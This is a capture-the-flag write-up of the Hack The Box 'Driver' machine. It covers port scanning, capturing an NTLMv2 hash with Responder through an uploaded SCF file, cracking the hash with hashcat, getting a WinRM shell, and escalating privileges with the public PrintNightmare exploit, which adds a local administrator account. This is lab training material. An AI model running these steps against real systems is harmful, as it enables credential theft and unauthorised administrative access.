Driver Write Up



Driver is a easy box from Hack The Box, demonstrating the impact of the Windows PrintNightmare vulnerability and also I learnt about SCF files. This was a new attack vector for me.


I deployed the machine and was given the target IP I started a NMAP scan to check the available ports.

└──╼ $sudo nmap -sC -sV -oA nmap/initial
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 17:20 GMT
Nmap scan report for
Host is up (0.020s latency).
Not shown: 997 filtered ports
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-02-28T00:20:49
|_  start_date: 2022-02-27T04:55:51

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.89 seconds

3 Ports open:

  • 80 - HTTP - Microsoft IIS httpd 10.0
  • 135 - MSRPC - Microsoft Windows RPC
  • 445 - SMB - Microsoft Windows 7 - 10 microsoft-ds

I also ran a full port scan and found winrm to be open on port 5985.

└──╼ $sudo nmap -p- -oA nmap/all_ports
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 17:25 GMT
Nmap scan report for
Host is up (0.026s latency).
Not shown: 65531 filtered ports
80/tcp   open  http
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
5985/tcp open  wsman

The web service is showing an unauthorized response however it could be leaking a username with the message “Please enter password for admin”.


Before looking at the web service I tried enumerating SMB with various tools such as smbmap, smbclient and CrackMapExec however I had no joy.

└──╼ $cme smb
SMB    445    DRIVER           [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
└──╼ $smbmap -H
[!] Authentication error on

So I turned my attention to the web service. Navigating to the IP I did get a login prompt. I tried admin:admin and got in!


Once logged in, I get a simple web page but an email address of ‘support@driver.htb’. I updated my host file with ‘driver.htb’ just in case I need it later.


The only link that works on the web page is ‘Firmware Updates’. This page provides an upload function. I played around with this for such a long time, trying attacks like XSS, uploading PHP shells but nothing worked.


However re-reading the line:

Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.

I decided to change my google search to “http smb file share exploit” and found an article on using SCF files.

Initial Access

The first article that returned was from Penetration testing lab https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/. After reading the article I created the file test.scf using the example they provide and changed the IP to my VPN IP.

└──╼ $cat test.scf 

I started responder with the command ‘sudo responder -I tun0’.

Then uploaded the file using the web upload function and got a hit from responder

[SMB] NTLMv2-SSP Client   :
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:87ea6d299d14fa32:ED6355EFB0444E974805B3FF0E0B9B26:0101000000000000803021AB042CD801AE67B0D5B0D050060000000002000800350054003400480001001E00570049004E002D0

I put the hash in to a file called ‘hash’ and used hashcat to crack it with the command hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt.

Now I had a username and password I was able to use winrm to login. To login I used Evil-WinRM.

└──╼ $/opt/evil-winrm/evil-winrm.rb -u tony -i
Enter Password: 

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> 

Priv Esc

Now I had a foothold, I did some basic enumeration of the box. Looking at the running services I could see the Windows print spooler service.

    381      23     5164      14448 ...12            1128 spoolsv

This made me think of the PrintNightmare exploit. I could also have used rpcdump to find this.

└──╼ $rpcdump.py | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol 

To exploit this I used the exploit created by Caleb Stewart and John Hammond.

I used git to clone the repo in to my /opt directory.

└──╼ $sudo git clone https://github.com/calebstewart/CVE-2021-1675.git
Cloning into 'CVE-2021-1675'...
remote: Enumerating objects: 40, done.
remote: Counting objects: 100% (40/40), done.
remote: Compressing objects: 100% (32/32), done.
remote: Total 40 (delta 9), reused 37 (delta 6), pack-reused 0
Receiving objects: 100% (40/40), 131.12 KiB | 932.00 KiB/s, done.
Resolving deltas: 100% (9/9), done.
└──╼ $cd CVE-2021-1675
└──╼ $ls
CVE-2021-1675.ps1  nightmare-dll  README.md

Now using Evil-WinRM I can upload the powershell script and execute it.

*Evil-WinRM* PS C:\Users\tony\Documents> upload /opt/CVE-2021-1675/CVE-2021-1675.ps1
Info: Uploading /opt/CVE-2021-1675/CVE-2021-1675.ps1 to C:\Users\tony\Documents\CVE-2021-1675.ps1

Data: 238080 bytes of 238080 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\tony\Documents> Import-Module C:\Users\tony\Documents\CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll

It worked! I canceled my current WinRM session and logged back in using the new credentials.

*Evil-WinRM* PS C:\Users\tony\Documents> exit

Info: Exiting with code 0

└──╼ $/opt/evil-winrm/evil-winrm.rb -u adm1n -i
Enter Password: 

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\adm1n\Documents> cd C:/Users/Administrator/Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/26/2022   8:56 PM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt

Thats the box, thanks for reading!


Any comments or feedback welcome! You can find me on twitter.

Buy Me A Coffee